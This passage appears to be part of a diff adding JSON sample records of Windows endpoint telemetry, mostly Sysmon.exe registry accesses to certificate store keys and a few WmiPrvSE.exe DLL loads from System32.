"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfctrs.dll", + "image_path": "C:\\Windows\\System32\\perfctrs.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "tquery.dll", + "image_path": "C:\\Windows\\System32\\tquery.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 
131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfts.dll", + "image_path": "C:\\Windows\\System32\\perfts.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + 
"process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "usbperf.dll", + "image_path": "C:\\Windows\\System32\\usbperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiApRpl.dll", + "image_path": "C:\\Windows\\System32\\wbem\\WmiApRpl.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": 